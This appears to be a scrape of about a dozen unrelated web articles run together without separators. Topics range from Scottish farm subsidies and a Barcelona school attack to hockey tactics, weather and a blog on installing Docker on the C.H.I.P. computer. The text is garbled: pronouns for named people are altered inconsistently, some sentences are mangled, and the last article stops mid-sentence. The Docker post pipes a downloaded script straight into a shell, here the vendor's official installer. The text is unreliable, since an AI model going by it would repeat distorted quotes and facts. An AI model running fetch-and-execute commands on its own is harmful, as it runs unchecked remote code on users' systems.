The Scottish government is set to `` fall short '' of Friday 's deadline for farm subsidy payments , MSPs have been told .
It emerged last week that Scottish ministers want this week 's deadline extended for Common Agricultural Policy payments extended to October .
Rural Economy Secretary Fergus Ewing told MSPs that 90 % of payments were expected to be completed on time .
They said other payments would follow `` fairly shortly thereafter '' , with talks over potential EU penalties ongoing .
Nicola Sturgeon has apologised for the delays . Speaking to farming leaders last week , the first minister said there was `` no complacency '' on the part of their government and insisted there was a `` 100 % focus '' on getting payments made .
Fergus Ewing told the rural economy committee that 82 % of pillar one payment had been made so far , and that it was projected that about 90 % should be complete by Friday 's deadline .
A formal approach has been made to the European Commission about extending the deadline - something which also happened extended to October last year after problems with the Scottish government 's new £178m IT system .
There have been warnings that the government could face fines of up to £60m over the issue , with Audit Scotland saying the troubled IT system still presents `` significant risks and costs for the Scottish government '' .
Image copyright Getty Images
Faming leaders have called for progress on delivering the `` vital '' subsidies , not more apologies .
European Commission sources said last week that the latest request for an extension was still being considered , with the Scottish government urged to speed up payments ahead of the current deadline of 30 June .
'Primary concern '
At the committee , Mr Ewing said the government expected to `` fall short '' of the target of getting 95.24 % of payments through by 30 June . At present , 82 % of payments have been completed , with Mr Ewing insisting `` good progress '' was being made on others .
They said : `` Our central forecast is that we will make around 90 % of payments - in other words we will fall short by a few percentage points .
`` We are making a large number of payments each day to achieve that . I expect that the remaining payments will be made fairly shortly after the 30th of June - in other words they will not be made within the deadline , but fairly shortly thereafter . ''
Image copyright Getty Images
Mr Ewing added that `` virtually all eligible payments will be made by the end of August '' .
They said it was `` impossible '' to know what penalties the government might face , but said it was likely to be far less than the £60m figure suggested by the auditor general .
They said the government 's `` primary concern '' was getting payments out to farmers , with a decision to be taken shortly if a loan scheme would be needed to bridge gaps in payments would be needed in the coming year .
Scott Walker , chief executive of the National Farmer 's Union Scotland , said : `` We stand by our position that farmers and crofters should have been amongst the first to have been informed that an application to extend the payment window had been made .
`` While 90 % of support will have been delivered by 30 June , that is of little comfort to those still waiting on some or all of their payments . And the reality is that some are still waiting on payments being completed from 18 months ago and not just the current scheme year .
`` Complete trust and confidence in the IT system will only be achieved when the Scottish government outlines a clear monthly timetable for payment delivery and that timetable is met without exception . ''
What are the CAP payments ?
Reforms to the CAP system saw the Single Farm Payment Scheme replaced by the new Basic Payment Scheme ( BPS ) in 2015 .
The BPS is the main EU subsidy available to farmers in Scotland , with the money being allocated by the Scottish government .
The payments are designed to act as a safety net for farmers and crofters by supplementing their main business income .
A total of 19,674 different Scottish rural businesses received a total of about £650m in CAP payments last year .
WASHINGTON DC -- Kurdistan Regional Government ( KRG ) Representation in Washington will hold a reception in honor of US military veterans for their support to the people of Kurdistan and Iraq on Thursday .
“ We are hosting this reception to thank American veterans of military and humanitarian operations in Iraq and Kurdistan , ” Bayan Sami Abdul Rahman KRG 's Representative to Washington told Rudaw .
Abdul Rahman said that the KRG honors US veteran who rushed to help millions of Kurds who fled the advancing Iraqi army in 1991 and were “ were stuck on the mountains without even the barest necessities and were dying from exposure , ”
The event is held on the 24th anniversary of the end of Operation Provide Comfort I and the start of Operation Provide Comfort II , which eventually led to the establishment of the autonomous Kurdistan Region following a popular uprising against the regime of Iraq 's former dictator Saddam Hussein .
“ Saddam 's forces were threatening the Kurds after the Uprising . Those operations launched by the US saved thousands of lives , ” said the KRG representative in Washington .
Abdul Rahman said the Kurds remain loyal to their friends , in particular the United States .
“ We Kurds do n't forget our friends , ” they said . “ The United States has played a critical role at key turning points in Kurdistan 's recent history : in 1991 with Operation Provide Comfort , in 2003 with the liberation of Iraq and in 2014 with the defence of Erbil and Mount Sinjar . Today we are together fighting ISIS and upholding freedom . ”
KRG Minister of Foreign Relations Falah Mustafa and a number of American generals and military figures are expected to attend the reception to be held at the KRG representation in the US capital .
The children of divorcing or separating parents are often proverbially “ caught in the middle. ” What 's worse is when one parent tries to turn the child against the other parent , through bad-mouthing , lying or withholding contact .
Sound familiar ? That behavior – deliberately trying to sabotage a child 's relationship with the other parent – has a name : parental alienation . It 's a topic familiar to most people , but in social , psychological and legal realms , it 's understudied , and under-discussed .
Colorado State University social scientists Jennifer Jill Harman and Zeynep Biringen want to bring attention to the prevalence , implications and dangers of parental alienation . They 've written a book , “ Parents Acting Badly : How institutions and societies promote the alienation of children from their loving families , ” self-published Jan. 1 . The book is available on Amazon .
“ There is so much more to this than just two parents fighting , ” said Harman , associate professor of psychology in CSU 's College of Natural Sciences . “ It 's a systemic , social problem . ”
Harman is a social psychologist who studies intimate relationships , and Biringen , a professor of human development and family studies in CSU 's College of Health and Human Sciences , is a developmental psychologist who studies parent-child relationships , attachment theory and emotional availability . The research , which they 've termed the Colorado Parental Alienation Project , was a natural cross-section of their interests , as well as an important , understudied topic that affects families all over the world . They plan to continue publishing different aspects of their parental alienation research in coming months .
Parental alienation as a social problem
Most of the people who have researched parental alienation have done so from a clinical perspective , by studying children in therapy who are traumatized by what 's happening . Harman and Biringen wanted to reframe the problem through the lens of social psychology theory .
Alienation , Harman emphasizes , is different from estrangement . Estrangement is what happens when the parent is actually doing something bad or abusive , and the relationship with the child is justifiably strained or broken . Parental alienation , on the other hand , is when the child 's emotional separation from the alienated parent is fueled by untruth or exaggeration from the other parent .
The book , written for a general audience , contains stories from interviews conducted with more than 80 parents who had responded to a survey . “ We had a response rate that neither one of us has seen in any of our research projects , ” Biringen said .
They also conducted a representative poll in collaboration with Sadie Leder-Elder of High Point University to gather data on how familiar people are with the concept of parental alienation .
Stepparents , grandparents are affected , too
Throughout their research , conducted over the last two years , Harman and Biringen found that both mothers and fathers alienate , but the custodial parent ( who is more likely to be the mother ) has more opportunity to do so . They also found that it 's not just parents – grandparents are victims too , as are stepparents .
The topic is n't without controversy . Parental alienation is not an accepted syndrome listed in the Diagnostic and Statistical Manual of Mental Disorders , because the alienation results from something being done to the child – it 's not an inherent behavior in the child . But alienation , more generally , is a type of abuse , Harman points out .
They liken the lack of understanding around parental alienation to domestic violence – it used to be seen as a private problem between two people . But once domestic violence was proved to be a systemic issue that impacts society and causes devastation in families , “ that 's when people started to take it seriously , ” they said .
In the same way , Harman and Biringen are trying to reframe parental alienation as something that affects society as a whole , not just individuals , couples and families .
Reshaping attachment theory
Biringen also said that their findings may lead to a reshaping of the widely studied attachment theory of parenting , which is the social psychological theory in which interactions between parent and child determine the quality of the relationship . Because parental alienation is done to a child , as opposed to being a direct child-to-parent interaction , the definition of attachment may need to be expanded or reexamined .
Parental alienation happens in intact families , too , Biringen added . During the authors ' research , many divorced or separated interview participants recalled instances of alienation long before the breakup , but either did not recognize it as such , or gave the benefit of the doubt , because they wanted the relationship to work out .
As a stepparent , Harman says they themselves have suffered parental alienation , and it was this personal experience that inspired them to undertake the scientific study . The more they delved into it , the more they realized the book needed to be written .
Harman was selected for a March 5 CSU TEDx Talk on the subject of parental alienation .
Order the book here .
This short exercise is designed to train you to pick without anchoring your fingertips on the pickguard , and to encourage forearm rotation when playing single notes . You 'll switch from playing a few notes to strumming a big chord , keeping things loose yet striving for accuracy . I 'd start with the metronome set at about 60 beats per minute . You can let your fingernails drag across the pickguard as you play the single notes , but do n't anchor your fingertips on it . To damp unwanted strings while playing singles notes , you can bring the heel of your palm in to touch the strings by the bridge , but try to keep the ball of the thumb off the guitar . Also use the edges of the fret-hand fingers to damp the strings above and below the one you are playing . Keep it relaxed , and listen close to make sure it 's clean and smooth-sounding .
theScore 's multi-part team previews include a look at something that separates each team from the pack . From specific breakouts to powerplay formations and beyond , Justin Bourne and Thomas Drance hope to highlight something you have n't noticed in the past .
What we noticed
The Devils are an extremely “ low event ” team , partially thanks to their stingy neutral zone play
The 2013-14 New Jersey Devils were never going to be named The Greatest Show on Ice , simply because their style limits noteworthy plays from happening . They do n't allow shots ( or take them ) , they do n't allow goals ( or score them ) , and somehow nothing else seems to happen , either .
This is at least partly due to their personnel and their super efficient neutral zone forecheck . When players trust their teammates to do their respective jobs , they 're able to be more aggressive with their own , as New Jersey demonstrated throughout last season .
We 'll get more into exactly what I mean , but first ...
The numbers
No team allowed fewer shots than the Devils ' 25.5 per-game average , which translated into 2.38 goals against per game , sixth best in the league . They managed this feat despite finishing last in the NHL in blocked shots , which highlights how few attempts they allowed .
The problem : the numbers looked the same at the other end . They had the third-lowest shots-for total ( 26.8 ) , while their 2.4 goals per game ranked 27th overall . They were shutout 10 times , a number surpassed by zero teams .
All of this led to the Devils playing in a whopping 50 one-goal games - more than any other team . Trying to keep games close seems kinda smart when you go 1-8 in two-goal games ( a .111 winning percentage , worst in hockey ) .
This is n't the passive , pure trapping Devils of yore , so ... how did we get here ?
The breakdown
Hockey teams without the puck automatically fall into a system , and for many it takes years of practice and learned discipline to really figure out how to be reliable within this structure . Older players tend to be more consistent in their positional play for this reason .
Well , the Devils are as old as dirt - they were the oldest team in hockey last year - and are nails within their system .
I 'm not claiming to be in the room with head coach Peter DeBoer here , but from what I can tell , that discipline combined with an aggressive neutral zone forecheck contributes to what makes the Devils so “ low event ” against . It still seems to be a 1-2-2 , but New Jersey involves their defense heavily to keep the neutral zone a swamp for opponents .
Your normal 1-2-2 looks something like the picture below . F1 is up ice , pushing the puck to the wall ; F2 is on the defensive side of the opposing winger on the wall ; F3 is above the opposing center ; and the defensemen are making reads from there .
In today 's neutral zone regroups , teams tend to stretch the strong side winger . The Devils ' set up allows for F2 to release them to the D-man if they do ( that way they do n't simply give up the red line , and they can try to make a play on the puck ) , or just check them if they do n't .
With the Devils , F3 knows that when the puck goes up that wall , they have to be ready to retreat and cover .
You can easily have numbers back this way , and you can still stuff plays on the wall and pick off a few passes .
If the puck is run back D-to-D by the opposing team and they try to go up the other wall , it 's an easy shift to the other side .
From what I can tell , when this happens against New Jersey , F1 and F2 switch . Here 's a quick look at that - it 's not the craziest wrinkle ( even some junior teams use it instead of keeping F1 on the puck ) , but it does emphasize how much rotating they do to keep pressure on .
F1 swings across …
The puck goes D-to-D , and F1 is into F2 's area of the ice …
So F2 comes across hard and becomes F1 .
( You 'll see in a GIF below that those two blurs did in fact switch . )
But anyway , onto the aggressive D and smart forwards .
Of note in the GIF : as the Islanders go up the strong side , the guy stuffing the play along the wall is number seven , Mark Fayne , while number 17 , Michael Ryder ( F3 in this case ) , has receded back into coverage at the bottom of the screen , staying with the Islanders other forward .
( Courtesy : MSG )
That also frees up someone to go back on a dump in ( with an outlet ) had the Isles got the puck deep .
You can see below ( top of screen ) that as the play goes up the strong side , the Devils ' D-man steps in to stuff the play while Jaromir Jagr ( F2 ) goes back . My favorite part , however , is Travis Zajac ( 19 ) starting in as F1 after the Pens recover the puck , then seeing or hearing Danius Zubrus ( number eight ) , and immediately peeling off to resume their role on the new strong side .
( Courtesy : MSG )
But again , the real noteworthy part : a D-man pinches up along the wall at the bottom of the screen , and this time the puck goes all the way down for an icing . That 's Fayne 's second appearance doing a killer job in the neutral zone . They were way up-ice there .
This time we 're going to look at something different : Mark Fayne ! There they are again overtop the Blues forward in the neutral zone where the Blues defender is trying to make the pass .
And again , Michael Ryder ( 17 ) is faded deeper than the aggressive D-man . They stayed with the other forward through center , meaning everyone was covered .
This rotation helped the Devils allow the fewest shots against per carry in , the fewest shots against per dump in , and the fewest shots against per zone entry period . Nobody got easy access . They also allowed the second-lowest percentage of carry ins as a proportion of total entries , at least partially thanks to their defensively aggressive play through the middle .
The Devils play different hockey in both the neutral zone and defensive zone , which allows them to hang in the top five of Corsi and Fenwick with L.A. , San Jose , Boston , and Chicago . At the very least , activating their D on regrouping forwards seems like part of the reason why .
Now , if only they could bury pucks at an average rate . They could take the step from `` nothing happens '' to `` interesting '' real quick .
Teacher killed , four wounded in suspected crossbow attack at Barcelona school
Updated
Spanish police have arrested a minor on suspicion of killing a teacher and wounding four others in an attack believed to involve a crossbow at a high school in Barcelona .
The alleged attacker was aged under 14 , a police spokesperson said , but they could not confirm that they were a pupil at the school .
Police said it appeared the perpetrator used a crossbow . Firearms were ruled out .
A student from the school said they had seen the attacker wield a knife .
`` The boy came into our class with a knife and wanted to attack a friend of mine , '' the student told Reuters .
`` But they did n't manage to , they left , and we had a chance to run away . ''
The teacher killed was a male . Two teachers and two students were also wounded in the attack , which took place after classes had started , police said .
None of their injuries were serious .
Such attacks are a rarity in Spain . The incident occurred on the anniversary of the 1999 Columbine school killing in Colorado in the United States in which 12 students died .
Under Spanish law , minors under the age of 14 can not be formally arrested or criminally tried .
They are only held in specialised centres in exceptional cases .
Reuters
Topics : law-crime-and-justice , crime , schools , death , spain
First posted
A case in Miami may reach into the inner sanctums of the Vatican :
THE Vatican and Pope Benedict XVI have come under fire in the US for allegedly covering up for another predator priest and doing nothing to remove them from ministry .
Documents sent to AFP by lawyers representing a man who claims they were sexually abused as a teen by Father Ernesto Garcia Rubio claim the Papal Nuncio – the Vatican ambassador to the US – asked the church in Miami to protect Father Garcia after they moved there from Cuba in 1968 after “ serious difficulties of a moral nature ” .
“ He was in ministry here in Miami for about 30 years and during that time we know of about a dozen victims that they abused , ” said Jessica Arbour , a lawyer for the unnamed victim and five others who are suing the archdiocese of Miami for alleged abuse between 1977 and 1987 .
“ There was definitely a concerted effort at all levels – from the Vatican to the archdiocese of Miami and even the Cuban diocese they were originally ordained for – to cover up for and protect this guy .
“ At the Vatican 's request – they said , ‘ Please protect him ' and that 's what they did for 30 years . ”
( … )
Ms Arbour also accused Pope Benedict XVI of “ protecting pedophiles at the expense of parishioners and families ” when they were head of the Roman Catholic church 's moral watchdog , the Congregation of the Doctrine of the Faith ( CDF ) .
When a bishop in the 1990s began the process of defrocking Father Garcia , the Congregation of the Doctrine of the Faith in Rome “ lost the paperwork ” , Ms Arbour said .
Father Garcia is no longer a priest .
The CDF was led from 1981 to 2005 by Cardinal Joseph Ratzinger
Houston is enjoying fine , cool weather this morning , with temperatures ranging from the mid-40s across Montgomery County down to around 60 degrees at the coast . If only this would last , but we know it wo n't .
Today
Expect mostly sunny skies today as high pressure persists for most of the day over Houston , with high temperatures rising to about 80 degrees . At some point this afternoon or evening we 'll see the resumption of winds from off the coast . Lows tonight should still get into the low 60s for most of Houston .
Tuesday
A similar day to Monday , although slightly warmer for the region , and with the persistent onshore flow we 'll see a much warmer night , with overnight lows into Wednesday morning about 10 degrees warmer .
Wednesday
For a couple of days we 've been watching the possibility of a cool front on Wednesday with a “ will it or wo n't it ” question as to whether it will move all the way through the Houston area . Now it looks like the front will indeed make it through , and now the question is its potential for rain . Conditions are more favorable for rain north of Houston than over central or southern parts of the region , and even then I do n't think we 're looking at more than a tenth of an inch , or two . Highs in the mid-80s .
Thursday
The cool front will give us a brief reprieve in overnight temperatures , and I expect central and northern parts of Houston will have a chance to get into the upper 50s on Thursday morning before another warm day in the mid-80s . Less humidity will also feel nice—but it wo n't last .
( Space City Weather is sponsored this month by The Mole , a Jonathon Price novel . )
Friday
By Friday the onshore flow should resume in full force , and along with rising humidity levels we can expect high temperatures in the mid- to upper 80s . It 's going to feel warm after our taste of cooler weather this weekend
Next weekend
We know it 's going to be warm next Saturday , with high temperatures in the upper 80s to potentially even 90 degrees . That is perhaps not the most welcome news for riders of the BP MS 150 , but it is also not the potentially the worst news , either . A fairly strong storm system will move out of the Rocky Mountains toward the end of next week , and it 's likely to bring severe weather over Oklahoma and parts of northern Texas . As this system moves east , and pushes a cold front across Texas , there is the possibility of some of these storms reaching as far south as Austin and Houston . Right now I 'd bet on the really nasty weather staying north—more Dallas than the Houston-Austin corridor—but that 's not something we can definitively say right now . For bike riders , the other potentially bad news is headwinds on Sunday , as riders may be pushing their bikes into the teeth of a 15-mph ( or so ) wind out of the northwest as a front blows through .
The upside for Houston is that , after storm chances end on Sunday , we should have another round of cooler , drier weather , although it 's not going to get quite so cool as it did this past weekend .
Posted at 6:50am CT on Monday by Eric
Docker is supported on the $ 9 C.H.I.P . computer
I guess you 're already knowing , one of the cheapest but powerful ARM boards is the $ 9 C.H.I.P . computer from Next Thing Co. @ NextThingCo . It has an ARMv7 1GHz CPU with 512 MByte of main memory , 4 GByte flash memory as disk storage and is equipped with onboard WiFi and bluetooth as well .
Some time ago I wrote a detailed blog post about how to Install Docker 1.12 on the $ 9 C.H.I.P . computer with the help of a custom Linux kernel which I built from source for this purpose and included all the necessary kernel modules which are required to run Docker . As an outlook I mentioned that one of the kernel developers from @ NextThingCo , namely Wynter Woods @ zerotri , is working to support Docker officially .
Kernel development and testing takes time and finally here it is !
Docker is running on the C.H.I.P . with their latest standard kernel !
Short overview
With the new Docker-enabled Linux kernel for the C.H.I.P . it 's really easy to install and use Docker on these tiny cute ARM devices . Basically you just have to update/upgrade to the latest software packages through the standard apt package management commands , have to install Docker and you 're good to go .
As I 've already covered all these steps in detail in my post Install Docker 1.12 on the $ 9 C.H.I.P . computer , we can take a shortcut and I 'm explaining only the new and shorter steps .
Necessary steps to install Docker
Flash the latest available firmware ( see last post ) Connect to the C.H.I.P . via USB or UART console cable ( see last post ) Configure WiFi connection ( see last post ) Configure SSH to access the C.H.I.P . ( see last post ) Checking the OS and Linux kernel version Upgrade the Linux kernel and operating system Install the Docker Engine the official way Run your first Docker Container on the C.H.I.P .
Step 5 : Checking the OS and Linux kernel version
Here I 've flashed the C.H.I.P . with the latest available firmware
uname -a Linux chip 4.4.13-ntc-mlc # 1 SMP Thu Nov 3 01:28:54 UTC 2016 armv7l GNU/Linux
and we can see it 's running a Linux kernel version 4.4.13-ntc-mlc which is compiled at Thu Nov 3 01:28:54 UTC 2016 . If you 've flashed your device weeks or months before , you could maybe see a different and older kernel version .
Step 6 : Upgrade the Linux kernel and operating system
The new Docker-enabled Linux kernel for the C.H.I.P . computer is already available in the standard APT package repository , but it 's not yet included in the latest firmware you can flash with the C.H.I.P . Flasher .
In order to update/upgrade the C.H.I.P . kernel we are going the easy way and performing a complete update and upgrade process of the operating system as well .
apt-get update apt-get upgrade
As you can see on the apt-get upgrade command , you 'll be asked to confirm to install a few new software packages which also includes the new kernel packages .
... The following packages will be upgraded : apt apt-utils base-files chip-mali-modules-4.4.13-ntc-mlc cpio dmsetup dpkg e2fslibs e2fsprogs gnupg gpgv libapt-inst1.5 libapt-pkg4.12 libc-bin libc6 libcomerr2 libdevmapper1.02.1 libdns-export100 libgcrypt20 libhogweed2 libicu52 libidn11 libirs-export91 libisc-export95 libisccfg-export90 libnettle4 libpam-modules libpam-modules-bin libpam0g libpcre3 libss2 libtasn1-6 libudev1 linux-image-4.4.13-ntc-mlc multiarch-support rtl8723bs-mp-driver-modules-4.4.13-ntc-mlc tar tzdata udev vim-common vim-tiny wget 42 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . Need to get 39.8 MB of archives . After this operation , 8562 kB of additional disk space will be used . Do you want to continue ? [ Y/n ]
At the end of the upgrade you have to reboot the device in order to boot the new Linux kernel . That 's all , really !
reboot
As you log in again , you can see
uname -a Linux chip 4.4.13-ntc-mlc # 1 SMP Tue Dec 6 21:38:00 UTC 2016 armv7l GNU/Linux
the new Linux kernel has the same version , but a newer build time from Tue Dec 6 21:38:00 UTC 2016 .
Step 6 : Install the Docker Engine the official way
To install Docker the official way is quite easy today because we can use the APT packages and install scripts directly provided by the Docker project . And Debian for ARMv7 is one of the officially supported OS .
curl -sSL https : //get.docker.com | sh
This will take some time , but after a while the Docker Engine is installed on your C.H.I.P . computer with just a few commands .
[ email protected ] : ~ # cat /etc/apt/sources.list.d/docker.list deb [ arch=armhf ] https : //apt.dockerproject.org/repo debian-jessie main
Check the version of the Docker client command .
[ email protected ] : ~ # docker -- version Docker version 1.12.2 , build bb80604
Check the versions of the Docker client , Docker API and Docker Engine .
[ email protected ] : ~ # docker version Client : Version : 1.12.2 API version : 1.24 Go version : go1.6.3 Git commit : bb80604 Built : Tue Oct 11 17:52:51 2016 OS/Arch : linux/arm Server : Version : 1.12.2 API version : 1.24 Go version : go1.6.3 Git commit : bb80604 Built : Tue Oct 11 17:52:51 2016 OS/Arch : linux/arm
Get some more details about the running Docker Engine .
[ email protected ] : ~ # docker info Containers : 0 Running : 0 Paused : 0 Stopped : 0 Images : 0 Server Version : 1.12.2 Storage Driver : devicemapper Pool Name : docker-0:16-33578-pool Pool Blocksize : 65.54 kB Base Device Size : 10.74 GB Backing Filesystem : ext4 Data file : /dev/loop0 Metadata file : /dev/loop1 Data Space Used : 305.7 MB Data Space Total : 107.4 GB Data Space Available : 6.596 GB Metadata Space Used : 729.1 kB Metadata Space Total : 2.147 GB Metadata Space Available : 2.147 GB Thin Pool Minimum Free Space : 10.74 GB Udev Sync Supported : true Deferred Removal Enabled : false Deferred Deletion Enabled : false Deferred Deleted Device Count : 0 Data loop file : /var/lib/docker/devicemapper/devicemapper/data WARNING : Usage of loopback devices is strongly discouraged for production use . Use ` -- storage-opt dm.thinpooldev ` to specify a custom block storage device . Metadata loop file : /var/lib/docker/devicemapper/devicemapper/metadata Library Version : 1.02.90 ( 2014-09-01 ) Logging Driver : json-file Cgroup Driver : cgroupfs Plugins : Volume : local Network : overlay bridge null host Swarm : inactive Runtimes : runc Default Runtime : runc Security Options : Kernel Version : 4.4.13-ntc-mlc Operating System : Debian GNU/Linux 8 ( jessie ) OSType : linux Architecture : armv7l CPUs : 1 Total Memory : 491 MiB Name : chip ID : Z7U2:2DYF : G54F:2QLU : AAG3 : TD7Y : YWSQ:6PRM:6ZW3 : WIC5:7DEA : HFFK Docker Root Dir : /var/lib/docker Debug Mode ( client ) : false Debug Mode ( server ) : false Registry : https : //index.docker.io/v1/ WARNING : No swap limit support WARNING : No kernel memory limit support Insecure Registries : 127.0.0.0/8
Finally we could see , the latest Docker Engine v1.12.2 for Debian/ARMv7 is now installed and is successfully running .
Step 8 : Run your first Docker Container on the C.H.I.P .
As a last step we 'd like to start a first Docker container , a small web server .
docker run -d -p 80:80 hypriot/rpi-busybox-httpd Unable to find image 'hypriot/rpi-busybox-httpd : latest ' locally latest : Pulling from hypriot/rpi-busybox-httpd c74a9c6a645f : Pull complete 6f1938f6d8ae : Pull complete e1347d4747a6 : Pull complete a3ed95caeb02 : Pull complete Digest : sha256 : c00342f952d97628bf5dda457d3b409c37df687c859df82b9424f61264f54cd1 Status : Downloaded newer image for hypriot/rpi-busybox-httpd : latest fec2773baaec570ba8b6e00296dfd11b4b4768d1b51e574d851968b9225b9d22
Now start your web browser and point it to the website from our Docker container .
open http : //192.168.2.112
Using the latest RC of Docker Engine
If you 'd like to get the latest Docker Engine for testing , like release candidates , you can install it pretty easily with
curl -sSL https : //test.docker.com | sh
Or you can upgrade your current system with
# edit /etc/apt/sources.list.d/docker.list # change 'main ' to 'testing ' cat /etc/apt/sources.list.d/docker.list deb [ arch=armhf ] https : //apt.dockerproject.org/repo debian-jessie testing apt-get update apt-get install -y docker-engine
Now you can test the latest available release candidate of the Docker Engine with all the newest features with Docker Swarm mode and other goodies .
docker version Client : Version : 1.13.0-rc3 API version : 1.25 Go version : go1.7.3 Git commit : 4d92237 Built : Mon Dec 5 19:00:08 2016 OS/Arch : linux/arm Server : Version : 1.13.0-rc3 API version : 1.25 ( minimum version 1.12 ) Go version : go1.7.3 Git commit : 4d92237 Built : Mon Dec 5 19:00:08 2016 OS/Arch : linux/arm Experimental : false
TL ; DR - Install Docker on the C.H.I.P . computer
For all the impatient users , these are the minimal steps to install the latest Linux kernel and the latest Docker Engine on the C.H.I.P . computer .
apt-get update apt-get upgrade -y reboot curl -sSL https : //get.docker.com | sh
DONE ! ! ! !
Acknowledgments
Again , I like to thank Wynter Woods @ zerotri from @ NextThingCo for their efforts and hard work to include all the Linux kernel changes necessary to run the Docker Engine pretty slick on the C.H.I.P . computer . It 's so great to see when all the changes will be accepted and implemented in the upstream version , so everybody can use the new features without spending too much time .
That 's the important point to work in opensource , contributing back so that all users benefit from the results !
Feedback , please
As always use the comments below to give us feedback and share it on Twitter or Facebook .
Please send us your feedback on our Gitter channel or tweet your thoughts and ideas on this project at @ HypriotTweets .
Dieter @ Quintus23M
Please enable JavaScript to view the comments powered by Disqus .
Disqus
The de Blasio administration abruptly scrapped plans to rezone a portion of Flushing , Queens , last week in response to problems with the proposal . The neighborhood was set to be one of 15 areas that would be targeted for residential development in order to advance the mayor 's affordable-housing agenda .
On Friday , City Councilman Peter Koo , who represents the area , sent a letter to the Department of City Planning outlining their objections to turning 11 industrial blocks between the polluted Flushing Creek and the terminus of the No . 7 train into a new neighborhood , Flushing West , that would include retail , open space and affordable apartments . That same day , the head of the department wrote back that the city shared many of their concerns , and would withdraw its plan .
`` We will turn our attention and our priority to planning efforts to other neighborhoods , '' wrote Carl Weisbrod , head of the planning department .
The about-face means that the city will have to look for another neighborhood to be part of the 15 rezonings Mayor Bill de Blasio promised in the spring of 2014 , when they announced their Housing New York plan . So far , the city has approved its first overhaul in Brooklyn 's East New York and has announced similar intentions for a handful of other areas in the city .
A rezoned Flushing West would have potentially sprouted 1,600 apartments , affordable and market-rate . But Koo envisioned a number of complications along with strains on the area 's infrastructure and transportation , some of which resonated with city officials .
For example , the proposed development sites in Flushing West would have had to comply with strict height restrictions owing to their proximity to LaGuardia Airport . Koo said that certain flight paths departing and arriving at the airport would have to return to pre-2012 configurations in order to make a viable plan work , which would have required federal intervention .
Additionally , Flushing Creek and the nearby Flushing Bay are home to some of the five boroughs ' most active combined sewer overflow pipes , which release raw sewage during heavy rains when the city 's sewer system is inundated with water . Current plans to address the overflows do n't involve reducing the amount of sewage jettisoned into the waterways , and Koo argued that adding more housing would only increase the burden .
While the de Blasio administration dropped current plans to rezone Flushing West , Weisbrod said the city could revisit the idea at some future date if some of the underlying problems were to be resolved .
`` We are continuing to work with the community to address the important quality of life and planning issues that are unique to Flushing . '' a spokesperson for the mayor said in a statement .
Algeria plans to grant residency rights and job permits to illegal African migrants amid a shortage of workers in farming and construction and after a surge in racist sentiment across the country .
Prime Minister Abdelmadjid Tebboune 's plan follows the launch of an anonymous online campaign that blames African migrants for taking jobs and spreading the HIV virus that causes Aids .
To determine the number of beneficiaries of the scheme , the interior ministry is organising a census while security services will screen potential residency candidates .
`` They will get a residency document which will allow them to get a job , '' Tebboune told politicians on Friday night .
They gave no further details on the scheme .
`` That 's great news , I will be happy if I can work under the framework of the law , '' a young Malian working illegally in a housing project as a mason in Ouled Fayet , west of Algiers , told Reuters news agency .
READ MORE : Algeria and Morocco urged to assist Syrian refugees
Youth unemployment is running at around 30 percent in Algeria , but the country also faces a shortfall of workers in some sectors as it tries to steer its economy away from overreliance on oil and gas production .
The online anti-migrant campaign has shocked many in Algeria , which sees itself as a leading influence in the Sahel region and more widely in Africa , for example negotiating a peace deal in 2015 in Mali .
Last month a hashtag `` No to Africans in Algeria '' was widely shared on Twitter and Facebook , calling for expulsions to protect Algerian families and prevent `` chaos '' .
Amnesty International 's local representative , Hassina Oussedik , has urged the government to do more to protect African migrants .
There are unofficially an estimated 100,000 African migrants in Algeria , who have escaped acute poverty and conflict back home .
Most of the migrants are from Mali , Niger and Burkina Faso and some use Algeria as a transit country en route to Europe via neighbouring Libya .
Photo by Rodrigo Ferrari
Update : Wilson has retracted their Tweet , writing `` Clarity : Kanye West album release date has NOT been confirmed . Apologies to Chris Atlas . ''
This morning , Kanye West revived their Twitter account to Tweet : `` June Eighteen '' . Now , journalist Elliott Wilson has posted on Twitter : `` Chris Atlas at Def Jam confirmed . Kanye West . New album . 6.18.13 . '' Get psyched .
Earlier this week , Hot 97 's Peter Rosenberg said he 'd heard a rumor that the album was finished , and that it was described as `` dark '' . Like us , you 're probably hoping Kanye debuts a new song when they appear as the musical guest on the season finale of `` Saturday Night Live '' May 18 . He 's also scheduled to perform at this year 's Governors Ball in New York City from June 7 to 9 .
`` Lost in the World '' , from My Beautiful Dark Twisted Fantasy :
Long before the speakers at Wrigley Field blasted Steve Goodman 's “ Go , Cubs , Go ” after each triumphant Cubs game and long before players approached the batter 's box with their signature walk-up songs , music and baseball have been indelibly intertwined . A new exhibition at the Library of Congress will look at this winning combination , from before the Civil War to the present day. “ Baseball 's Greatest Hits : The Music of Our National Game ” opensin the Performing Arts Reading Room Gallery in the Library 's James Madison Building , 101 Independence Blvd . S.E. , Washington , D.C.2017 and is free and open to the public fromTickets are not required.The 45-item exhibition will feature baseball sheet music , drawn from the collections of the Music Division at the Library of Congress . The division holds one of the largest collections of baseball sheet music in the nation . Most of the works are original copyright deposits , which came to the Library through its copyright registration program . The songs chronicle baseball 's greatest moments and celebrate the pleasures of a day at the park , great players or hometown teams.A video station will feature the performances of many great baseball songs , including “ Did You See Jackie Robinson Hit that Ball ” by Count Basie ; “ Baseball Blues ” by Claire Hammill ; “ Right Field ” by Peter , Paul and Mary ; “ There Used to Be a Ballpark ” by Frank Sinatra ; “ All the Way ” by Eddie Vedder ; “ You Got ta Have Heart ” by the 1969 New York Mets ; “ Life is a Ballgame ” by Sister Wynona Carr ; and “ Talkin ' Baseball ” by Terry Cashman.A special segment will be devoted to the most popular baseball song of all , “ Take Me Out to the Ball Game. ” Visitors will hear a mashup of about 20 different covers of the song . On display will be the original copyright deposit for the 1908 sheet music , submitted by Tin Pan Alley 's legendary composer Albert von Tilzer and lyricist Jack Norworth . The Library 's exhibit curators , Robin Rausch and Susan Clermont , found that “ Take Me Out to the Ball Game ” has been featured in more than 1,200 movies , television shows and commercials , and has been recorded by more than 400 artists whose arrangements include classical , jazz , barbershop quartets and blues . It is considered the third most popular song in the United States today—after “ Happy Birthday ” and the national anthem.The oldest original baseball song , “ The Baseball Polka ” from 1858 , will be featured in a segment on baseball “ Before the Pros. ” Other themes covered in the exhibit include baseball as “ The National Game ” ; baseball in Washington , D.C. ; baseball as “ The Game of Love ” ; and songs commemorating teams , players and fans.The exhibition was created by Rausch and Clermont , specialists in the Library 's Music Division , and exhibition director Betsy Nahum-Miller , a senior exhibit director in the Library 's Interpretive Programs Office . An online version of the exhibition will be available on the opening date.The Library of 